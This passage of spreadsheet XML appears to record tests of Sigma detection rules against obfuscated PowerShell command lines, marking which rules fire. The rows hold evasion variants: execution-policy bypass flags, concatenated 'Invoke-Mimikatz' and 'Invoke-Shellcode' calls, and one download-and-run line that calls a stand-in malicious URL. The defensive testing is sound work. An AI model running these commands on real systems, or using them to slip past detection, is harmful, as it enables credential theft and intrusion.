          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2836" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2836" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2836" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2836" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2836" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2836" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2837" ht="15.75" customHeight="1" s="42">
      <c r="A2837" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B2837" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2837" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2837" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2837" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2837" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2837" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2837" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2837" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2837" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2838" ht="15.75" customHeight="1" s="42">
      <c r="A2838" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B2838" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2838" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2838" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2838" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2838" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2838" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2838" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2838" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2838" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2839" ht="15.75" customHeight="1" s="42">
      <c r="A2839" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B2839" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2839" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2839" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2839" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2839" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2839" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2839" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2839" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2839" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2840" ht="15.75" customHeight="1" s="42">
      <c r="A2840" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B2840" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2840" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2840" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2840" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F2840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2840" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2840" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2840" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2840" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2840" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2841" ht="15.75" customHeight="1" s="42">
      <c r="A2841" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2841" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2841" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2841" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2841" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2841" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2841" s="44" t="n"/>
      <c r="J2841" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2841" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2842" ht="15.75" customHeight="1" s="42">
      <c r="A2842" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2842" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2842" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2842" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2842" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2842" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2842" s="44" t="n"/>
      <c r="J2842" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2842" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2843" ht="15.75" customHeight="1" s="42">
      <c r="A2843" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2843" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2843" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2843" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2843" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F2843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2843" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2843" s="44" t="n"/>
      <c r="J2843" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2843" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2844" ht="15.75" customHeight="1" s="42">
      <c r="A2844" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2844" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2844" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2844" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2844" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2844" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2844" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2844" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284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844" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2844" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2845" ht="15.75" customHeight="1" s="42">
      <c r="A2845" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2845" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2845" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2845" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2845" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXeCuTioNpOLICY Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2845" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2845" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2845" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284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845" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2845" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2846" ht="15.75" customHeight="1" s="42">
      <c r="A2846" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2846" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2846" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2846" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2846" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2846" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2846" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2846" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28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846" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2846" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2847" ht="15.75" customHeight="1" s="42">
      <c r="A2847" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2847" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2847" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2847" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2847" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2847" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284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847" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2847" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2848" ht="15.75" customHeight="1" s="42">
      <c r="A2848" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2848" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2848" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2848" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2848" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutIoNpolIcy Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2848" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2848" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2848" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284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848" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2848" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2849" ht="15.75" customHeight="1" s="42">
      <c r="A2849" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2849" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2849" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2849" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2849" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -cOmmAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2849" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2849" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2849" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I284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849" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2849" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2850" ht="15.75" customHeight="1" s="42">
      <c r="A2850" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2850" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2850" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2850" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2850" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -coMMaND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2850" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I285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850" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2850" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2851" ht="15.75" customHeight="1" s="42">
      <c r="A2851" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2851" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2851" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2851" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2851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851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2851" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2851" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2851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851" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2851" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2852" ht="15.75" customHeight="1" s="42">
      <c r="A2852" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2852" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2852" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2852" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2852" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -nOnINterACTIVe -ep Bypass -COMmAnD "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F2852" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2852" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2852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852" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2852" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2853" ht="15.75" customHeight="1" s="42">
      <c r="A2853" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2853" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2853" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2853" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2853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853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2853" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2853" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2853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853" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2853" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2854" ht="15.75" customHeight="1" s="42">
      <c r="A2854" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2854" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2854" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2854" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2854" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2854" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2854" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2854" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2854" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2854" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2855" ht="15.75" customHeight="1" s="42">
      <c r="A2855" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2855" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2855" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2855" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2855" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2855" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2855" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2855" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2855" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2855" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2856" ht="15.75" customHeight="1" s="42">
      <c r="A2856" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2856" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2856" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2856" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2856" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2856" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2856" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2856" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2856" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2856" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2857" ht="15.75" customHeight="1" s="42">
      <c r="A2857" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2857" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2857" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2857" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2857" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2857" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2857" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2857" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2857" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2857" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2858" ht="15.75" customHeight="1" s="42">
      <c r="A2858" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2858" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2858" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2858" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2858" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmand "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2858" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2858" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2858" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2858" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2858" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2859" ht="15.75" customHeight="1" s="42">
      <c r="A2859" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2859" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2859" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2859" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2859" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2859" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2859" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2859" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2859" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2859" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2860" ht="15.75" customHeight="1" s="42">
      <c r="A2860" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2860" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2860" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2860" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2860" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaND "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F2860" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2860" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2860" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2860" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2860" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2861" ht="15.75" customHeight="1" s="42">
      <c r="A2861" s="44" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B2861" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2861" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2861" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2861" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F2861" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2861" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2861" s="44" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2861" s="44" t="n">
        <v>0</v>
      </c>
